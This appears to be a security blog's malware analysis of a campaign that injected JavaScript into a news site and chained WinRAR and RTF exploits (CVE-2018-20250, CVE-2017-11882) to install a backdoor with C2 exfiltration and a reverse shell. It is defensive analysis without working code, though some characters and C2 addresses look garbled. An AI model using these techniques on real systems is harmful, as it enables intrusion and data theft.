To protect the news site, we will obscure any related identifying information. We will also refer to it as victim1 in the remaining parts of this article. If we normalize and deobfuscate the JavaScript script, as seen in Figure 3, we find that this script first checks cookie data to ensure that access is coming from a Windows system. Second, it checks for the existence of “_utma”, a cookie used to distinguish users and sessions in Google Analytics. If found, it would mean the actor wants fresh access to victim1. It then dynamically downloads a script from hxxps://click. This injected script is then able to execute arbitrary JS script delivered from the URL. We also found an analysis report mentioning a fake update campaign related to this URL. However, we didn’t observe attacks with this script during our research.įor more details, here is the report. Malware Analysis Dual Exploits UsedĪn attack begins with an exploit targeted at a vulnerable WinRAR file (cve-2018-20250). This exploit extracts another exploit for the vulnerable RTF file (cve-2017-11882). WinRAR (cve-2018-20250) exploit extracts backdoor There are two routes for this backdoor malware to infect the system.ġ. We can observe that this “.rar” file is really an “.ace” file, and that it has a corresponding unpacking path located in the blue square of figure 4. The file uses the WinRAR exploit to extract conf.exe to the Startup folder so it can be executed at system booting. However, this seems like a mistake or a test, because conf.exe is extracted correctly only when the username is “test”. Interestingly, we also found that conf.exe is infected by Sality, an infamous file infector malware. RTF (cve-2017-11882) exploit downloads backdoor When conf.exe is executed, both the backdoor payload in conf.exe and the Sality infector shellcode will be executed at the same time.Ģ. The extracted “.doc” file is really an “.rtf” file. It triggers the Microsoft Equation Editor, runs regsvr32.exe to connect to 154.222.14049, and then downloads the next stage - a malicious script named 123.sct. It then saves its installation path from the registry “Software\Microsoft\Windows\CurrentVersion\Run” file to the file “/Destro”. This malware contains stealthy functionalities designed to collect system information and send information to its C2 server. It can also download files and create a reverse shell for further attacks. Collects a directory list under a specific directory.Collects a file list in a specific directory.Collects data from a different application, such as Skype, Fetion, SogouInput, SogouDesktopBar, etc.This backdoor malware reads its C2 IP address from a constant RVA address. In this campaign, it tries to connect to the following C2 address: 122.112.24578. Interestingly, we found this backdoor malware always uses a Chinese-native software name to lure a victim to execute it. At first, it was simply an executable, but that was changed to a DLL version in 2018. The DLL version of the backdoor is encrypted and saved in the data section of a loader program. When the loader runs, the backdoor DLL is decrypted and loaded for running.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |